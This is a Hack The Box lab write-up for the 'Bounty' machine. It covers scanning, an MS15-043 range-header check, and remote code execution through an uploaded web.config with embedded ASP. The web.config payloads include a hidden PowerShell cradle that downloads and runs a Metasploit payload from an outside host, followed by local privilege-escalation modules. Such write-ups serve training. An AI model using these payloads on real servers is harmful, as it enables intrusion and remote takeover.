Writeup: Hack The Box - Machines - Bounty

(Updated: )
writeups
,

Description

  • Name: Bounty
  • IP: 10.10.10.93
  • Author: mrb3n
  • Difficulty: 4/10

Discovery

nmap -sV -sC -Pn -p 1-65535 -T5 10.10.10.93

1
2
3
4
5
6
7
8
9
10
Nmap scan report for 10.10.10.93
Host is up (0.051s latency).
Not shown: 65534 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Bounty
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.93
+ Target Hostname:    10.10.10.93
+ Target Port:        80
+ Start Time:         2018-06-17 16:06:26 (GMT2)
---------------------------------------------------------------------------
+ Server: Microsoft-IIS/7.5
+ Retrieved x-powered-by header: ASP.NET
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type

+ Retrieved x-aspnet-version header: 2.0.50727
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST 
+ Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST 

+ 7502 requests: 2 error(s) and 7 item(s) reported on remote host
+ End Time:           2018-06-17 16:14:32 (GMT2) (486 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

From dirsearch we got:

1
2
3
4
5
6
7
8
9
200 -  877B  - /transfer.aspx
301 -  156B  - /UploadedFiles  ->  http://10.10.10.93/UploadedFiles/
301 -  156B  - /uploadedFiles  ->  http://10.10.10.93/uploadedFiles/
301 -  156B  - /uploadedfiles  ->  http://10.10.10.93/uploadedfiles/
301 -  156B  - /aspnet_client  ->  http://10.10.10.93/aspnet_client/
403 -    2KB - /Trace.axd
301 -    3KB - /WebResource.axd?d=LER8t9aS
403 -    2KB - /aspnet_client/system_web/2_0_50727/Trace.axd
500 -    3KB - /aspnet_client/system_web/2_0_50727/WebResource.axd?d=LER8t9aS

Pwn

The / of the server will show up the above image and nothing else. The server allthough is vulnerable to the DoS MS15-043:

curl -v 10.10.10.93 -H "Host: anything" -H "Range: bytes=0-18446744073709551615"

1
2
3
4
5
6
7
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>Requested Range Not Satisfiable</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD>
<BODY><h2>Requested Range Not Satisfiable</h2>
<hr><p>HTTP Error 416. The requested range is not satisfiable.</p>
</BODY></HTML>
* Connection #0 to host 10.10.10.93 left intact

But the actual DoS exploit is not working on the image because the image is less than 256 KB.

The transfer.aspx is the only one accessible and contains a form upload.

We must first guess what kind of file the form accepts.

The form validates the uploaded file only by its extension and will put the file into the folder /uploadedfiles/ (IIS is case insensitive) with the same name+extension of our uploaded file.

If the file is not a valid PNG we get: The image "http://10.10.10.93/uploadedfiles/text.png" cannot be displayed because it contains errors.

From burp we got: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8.

Searching for a web shell in aspx we found an interesting article on exploiting the web.config file to run commands: https://soroush.secproject.com/blog/2014/07/upload-a-web-config-file-for-fun-profit/. The web.config is similar to the .htacess of Apache but this file is runned by server and can contains .NET code.

The basic file is:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
   <system.webServer>
      <handlers accessPolicy="Read, Script, Write">
         <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />         
      </handlers>
      <security>
         <requestFiltering>
            <fileExtensions>
               <remove fileExtension=".config" />
            </fileExtensions>
            <hiddenSegments>
               <remove segment="web.config" />
            </hiddenSegments>
         </requestFiltering>
      </security>
   </system.webServer>
</configuration>
<%
Response.write("-"&"->")
Response.write(1+2)
Response.write("<!-"&"-")
%>
-->

Which will returns 3 if the upload and run is correct. Next step is to run some shell commands using the object WScript.Shell from .NET framework

1
2
3
4
5
6
7
Set objShell = CreateObject("WScript.Shell")
command = "ipconfig"
Set objCmdExec = objshell.exec("cmd /c" & command)
getCommandOutput = objCmdExec.StdOut.ReadAll
Response.write("-"&"->")
Response.Write(getCommandOutput)
Response.write("<!-"&"-")

Actually the command runs successfully! We had a RCE!

With the command wmic OS get OSArchitecture we was able to get the architecture of the system: 64-bit and with where /r c:\ *.txt we discovered the user flag in c:\Users\merlin\Desktop\user.txt and with type c:\Users\merlin\Desktop\user.txt we got the first flag: e29ad89891462e0b09741e3082f44a2f.

For the root flag we need to access directly to the machine so using metasploit we crafted a payload to web deliver the meterpreter executable:

And the web.config:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
   <system.webServer>
      <handlers accessPolicy="Read, Script, Write">
         <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />         
      </handlers>
      <security>
         <requestFiltering>
            <fileExtensions>
               <remove fileExtension=".config" />
            </fileExtensions>
            <hiddenSegments>
               <remove segment="web.config" />
            </hiddenSegments>
         </requestFiltering>
      </security>
   </system.webServer>
</configuration>
<%
Set objShell = CreateObject("WScript.Shell")
command = "powershell.exe -nop -w hidden -c $N=new-object net.webclient;$N.proxy=[Net.WebRequest]::GetSystemWebProxy();$N.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $N.downloadstring('http://10.10.15.229:8080/d6whTSYy0OgPz');"
Set objCmdExec = objshell.exec("cmd /c" & command)
getCommandOutput = objCmdExec.StdOut.ReadAll
Response.write("-"&"->")
Response.Write(getCommandOutput)
Response.write(1+2)
Response.write("<!-"&"-")
%>
-->

Uploading this file and then curl http://10.10.10.93/uploadedfiles/web.config we got a session

and migrate to another process to avoid being kicked out.

Once we got the merlin user shell we used the metasploit module to find some feasible exploit on the machine with use post/multi/recon/local_exploit_suggester; we then tried the exploit exploit/windows/local/ms10_092_schelevator

And with the SYSTEM/NT shell we got the root flag